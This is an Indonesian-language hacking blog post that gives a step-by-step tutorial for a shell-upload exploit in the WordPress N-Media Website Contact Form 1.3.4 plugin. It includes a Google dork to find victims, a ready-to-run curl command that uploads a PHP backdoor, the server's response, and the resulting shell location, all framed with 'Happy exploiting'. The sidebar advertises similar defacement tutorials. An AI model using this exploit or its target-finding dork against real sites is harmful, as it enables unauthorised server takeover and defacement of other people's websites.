• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

April 14, 2015 by Jack Wilder 1 Comment

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !

Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux

Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
jackwilder@suckseed ~ % mkdir exp
jackwilder@suckseed ~ % cd exp

Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “Filedata=@./[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php

Sekian dan semoga bermanfaat .
Happy exploiting 🙂

Filed Under: WordPress Exploit Tagged With: Bugs, Exploit, Hacking, Linux, Wordpress

Reader Interactions

Comments

  1. Trio Gempar Surya Giri says

    March 12, 2017 at 5:11 am

    (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k)

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Prestashop Module Blocktestimonial File Upload Auto Exploit

WordPress Plugin CopySafe PDF Protection Shell Upload

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Cracking FTP Password using Hydra on BackBox Linux

LinuxSec / 14 queries in 0.70 seconds